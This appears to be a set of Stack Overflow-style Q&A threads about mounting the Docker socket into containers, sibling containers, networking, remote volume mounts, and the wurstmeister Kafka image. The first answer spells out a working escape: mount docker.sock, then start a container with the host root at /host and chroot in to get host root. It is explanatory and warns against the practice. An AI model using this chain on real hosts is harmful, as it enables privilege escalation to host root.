I was following the YouTube video linked in the article below, which shows how a docker container can get root access on the host.
There are a few steps which are unclear - can someone please explain further how they work?
https://www.lvh.io/posts/dont-expose-the-docker-socket-not-even-to-a-container.html
Step 1> Bind mount /var/run/docker.sock from the host into the container
Step 2> Install docker in the container <<< at this stage I see that docker ps -a shows all the containers that are present on the host.
**QUESTION:** How can the container see the containers present on the host? Is it because dockerd in the new container is using /var/run/docker.sock from the host? netstat/ss in the new container doesn't show anything...
Step 3> Run another container from the 1st container. Pass the following parameters to it:
docker run -dit -v /:/host ubuntu
The intention of this is to mount / from the host filesystem to /host in the 2nd container being created.
**QUESTION:** How does the 1st container have access to / (the filesystem of the host)?
Thanks.
Docker runs as a service on the host machine. This service communicates with clients via a socket which, by default, is the unix socket unix:///var/run/docker.sock.
When you share this socket with any container, that container gets full access to the docker daemon. From there, the container can start other containers, delete containers/volumes/etc., or even map volumes at will from the host into a new container, as described in your question with -v /:/host. Doing that gives the container root access to the host filesystem under /host/.
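For illustration, here is a minimal sketch of that whole chain (the container names, the docker:cli image and the assumption that the host has bash at /bin/bash are all just examples):
# 1) on the host: start a container with the daemon's socket mounted
docker run -it --name attacker -v /var/run/docker.sock:/var/run/docker.sock docker:cli sh
# 2) inside "attacker": the docker CLI talks to the HOST daemon through the socket,
#    so the new sibling container gets the host's root filesystem mounted at /host
docker run -it -v /:/host ubuntu chroot /host /bin/bash
# the shell that opens is effectively a root shell on the host filesystem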
In short: you should be careful sharing this precious socket with any container you don't trust. In some cases the shared socket makes sense (for example portainer: a container that serves as a management GUI to docker).
Related
I have docker on my host machine with a container running. I was wondering if it's possible, and what the best approach would be, to "trigger" a container creation from the running container.
Let's say my machine is host and I have a container called app (with id 123456789) running on host.
root@host $ docker container ls
123456789 app_mage .... app
I would like to create a container on host from within app
root@123456789 $ docker run --name app2 ...
root@host $ docker container ls
123456789 app_mage .... app
12345678A app_mage .... app2
What I need is for my app to be running on docker and to run arbitrary applications in an isolated environment (but I'd rather avoid docker-in-docker)
A majority of the Docker community will veer away from these types of designs; however, it is very doable.
Similar to Starting and stopping docker container from other container, you can simply mount the docker.sock file from the host machine into the container, giving it the privilege to access the docker daemon.
To make things more automated, you could use the docker-py SDK to start containers from inside a container, which would in turn talk to the Docker daemon on the host machine hosting the container that you are spawning more containers from.
For example:
docker run --name test1 -v /var/run/docker.sock:/var/run/docker.sock image1
----
import docker

def create_container():
    # docker.from_env() talks to the host daemon through the mounted /var/run/docker.sock
    docker.from_env().containers.run("image2", name="test2")
This example starts container test1, and runs that method inside the newly created container, which in turn creates a new container test2 running on the same host as test1.
Say I have a machine running docker (the docker host) and I spin up some containers inside this docker host.
I need the containers' services to be able to talk to each other - the containers expose ports and they also need to be resolvable by hostname (e.g. example.com).
Container A needs to talk to container B with the URL example.com:3000.
I've read the article below but I'm not quite sure about "inherit" from the docker host - will the docker host's /etc/hosts be appended to the /etc/hosts of a container running inside this docker host?
https://docs.docker.com/engine/reference/run/#managing-etchosts
How can this be achieved?
Does this "inherit" have any connection to the type of docker container networking described at https://docs.docker.com/v17.09/engine/userguide/networking/ ?
It does not inherit the host's /etc/hosts file. Docker updates the file inside your container when you use the --add-host parameter, or extra_hosts in docker-compose, so you can add individual records that way (https://docs.docker.com/compose/compose-file/#extra_hosts).
Although if you're just trying to get two containers talking to each other, you can alternatively connect them to the same network. In docker-compose you can create what's called an external network and have all your docker-compose files reference it. You will then be able to connect by using the full docker container name (e.g. http://project_app_1:3000).
See https://docs.docker.com/compose/compose-file/#external
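As a minimal sketch of both options (the network name appnet and the image names are just examples), a user-defined network gives containers name resolution for each other, and --add-host is the CLI equivalent of extra_hosts:
# create a user-defined network
docker network create appnet
# container "b" joins it; other containers on appnet can reach it by its name
docker run -d --name b --network appnet some-image-b
# container "a" can now call http://b:3000; --add-host appends a record
# (here "203.0.113.10 example.com") to a's /etc/hosts, just like extra_hosts
docker run -d --name a --network appnet --add-host example.com:203.0.113.10 some-image-a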
I put the docker host on one machine and the client on another. Then I try to run something like this from machine 2 (the client).
docker -H tcp://machine1:port run -v ./dummy-folder:/dummy-folder alpine sh
Is that dummy-folder going to work through the TCP connection?
Is the same valid for docker-compose too?
Is the same valid for docker swarm mode?
The volume mount happens locally on the docker host where the container runs; there is no path over the TCP connection for the volume mount (at build time the build context is packaged and sent from the client to the server, but that only applies to builds). Swarm is unchanged: if you mount a volume, it will be mounted on whatever host the container happens to run on.
If you can't replicate your data across the hosts, then you'll want to use a volume mount over the network to a shared storage location, or use a volume driver that does the replication for you (e.g. nfs, infinit, glusterfs, flocker).
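For example, a named volume backed by NFS can be created on the remote daemon and then mounted into containers there (the NFS server address and export path below are assumptions):
# run against the remote daemon; the NFS mount is made on machine1, not on the client
docker -H tcp://machine1:port volume create --driver local \
  --opt type=nfs --opt o=addr=nfs-server.example.com,rw \
  --opt device=:/exports/dummy-folder dummy-folder
docker -H tcp://machine1:port run -v dummy-folder:/dummy-folder alpine sh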
the scenario: I have a host that has a running docker daemon and a working docker client and socket. I have 1 docker container that was started from the host and has the docker socket mounted within it. It also has the docker client mounted from the host. So I'm able to issue docker commands at will from within this docker container using the aforementioned mechanism.
the need: I want to start another docker container from within this docker container; in other words, I want to start a sibling docker container from another sibling docker container.
the problem: A problem arises when I want to mount files that live inside the host filesystem into the sibling container that I want to spin up from the other sibling container. It is a problem because when issuing docker run, the docker daemon behind the socket mounted inside the docker container is really resolving paths against the host filesystem. So I need access to the host filesystem from within the docker container which is trying to start another sibling.
In other words, I need something along the lines of:
# running from within another docker container:
docker run --name another_sibling \
  -v {DockerGetHostPath: path_to_host_file}:path_inside_the_sibling \
  bash -c 'some_exciting_command'
Is there a way to achieve that? Thanks in advance.
Paths are always resolved on the host; it doesn't matter that you are running the client remotely (or in a container).
Remember: the docker client is just a REST client, and the -v path always refers to the daemon's file system.
There are multiple ways to achieve this.
You can always make sure that each container mounts the correct host directory
You can use --volumes-from, i.e.:
docker run -it --volumes-from=keen_sanderson --entrypoint=/bin/bash debian
--volumes-from Mount volumes from the specified container(s)
You can use named volumes, for example as sketched below
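A minimal sketch with a named volume (the volume name shared-data and the images are just examples); because the volume is managed by the daemon, it behaves the same whether docker run is issued from the host or from a container that has the socket mounted:
# create a daemon-managed named volume once
docker volume create shared-data
# one sibling writes into it
docker run --rm -v shared-data:/data alpine sh -c 'echo hello > /data/hello.txt'
# another sibling, possibly started from inside a different container, sees the same data
docker run --rm -v shared-data:/data alpine cat /data/hello.txt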
I am using the docker image for Kafka from wurstmeister.
The docker-compose file defines a volume such as /var/run/docker.sock:/var/run/docker.sock
What is the purpose of the above unix socket?
When should a docker image declare the above volume?
The kafka-docker project is making (questionable, see below) use of the docker command run inside the kafka container in order to introspect your docker environment. For example, it will determine the advertised kafka port like this:
export KAFKA_ADVERTISED_PORT=$(docker port `hostname` $KAFKA_PORT | sed -r "s/.*:(.*)/\1/g")
There is a broker-list.sh script that looks for kafka brokers like this:
CONTAINERS=$(docker ps | grep 9092 | awk '{print $1}')
In order to run the docker cli inside the container, it needs access to the /var/run/docker.sock socket on your host.
Okay, that's it for the facts. The following is just my personal opinion:
I think this is frankly a terrible idea and that the only containers that should ever have access to the docker socket are those that are explicitly managing containers. There are other mechanisms available for performing container configuration and discovery that do not involve giving the container root access to your host, which is exactly what you are doing when you give something access to the docker socket.
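For example, with this particular image the advertised listener can simply be passed in as environment variables when the container is started, so nothing inside it ever needs the socket (the hostnames and ports below are placeholders):
# configuration is supplied explicitly instead of being discovered via /var/run/docker.sock
docker run -d --name kafka -p 9092:9092 \
  -e KAFKA_ADVERTISED_HOST_NAME=kafka.example.com \
  -e KAFKA_ADVERTISED_PORT=9092 \
  -e KAFKA_ZOOKEEPER_CONNECT=zookeeper.example.com:2181 \
  wurstmeister/kafka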
By default, the Docker daemon listens on unix:///var/run/docker.sock and allows only local connections by the root user. So, generally speaking, if we can access this socket from somewhere else, we can talk to the Docker daemon or extract information about other containers.
If we want some process inside our container to access information about other containers managed by the Docker daemon (running on our host), we can declare the volume as above.
Let's see an example from the wurstmeister Kafka image.
The Dockerfile:
At the end of the file, it will call:
CMD ["start-kafka.sh"]
start-kafka.sh
Let's take a look at line 6:
if [[ -z "$KAFKA_ADVERTISED_PORT" ]]; then
export KAFKA_ADVERTISED_PORT=$(docker port `hostname` $KAFKA_PORT | sed -r "s/.*:(.*)/\1/g")
fi
When starting his Kafka container, he wants to execute the command below inside the Kafka container (to find the port mapping to the container...):
docker port `hostname` $KAFKA_PORT
Note that he mounted the above volume to be able to execute commands like this.
Reference from the Docker website (search for the "socket" keyword)
What is the purpose of the above unix socket?
Mounting the /var/run/docker.sock socket in a container provides access to the Docker Remote API hosted by the docker daemon. Anyone with access to this socket has complete control of docker and the host running docker (essentially root access).
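For instance, assuming curl is available inside the container, any process in it can drive that API directly over the socket:
# queries the Docker Remote API through the mounted unix socket; no TCP port needed
curl --unix-socket /var/run/docker.sock http://localhost/version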
When should a docker image declare the above volume?
Very rarely. If you are running a docker admin tool that requires API access inside a container then it needs to be mounted (or accessible via TCP) so the tool can manage the hosting docker daemon.
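For example, this is roughly how an admin tool like Portainer (mentioned earlier) is given API access; the published port is just its usual default:
docker run -d --name portainer -p 9000:9000 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  portainer/portainer-ce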
As larsks mentioned, docker-kafka's use of the socket for config discovery is very questionable.
It's not necessary to mount the docker.sock file; this can be avoided by commenting out the appropriate lines in kafka-docker/Dockerfile and start-kafka.sh. There is no need to add broker-list.sh to the kafka container.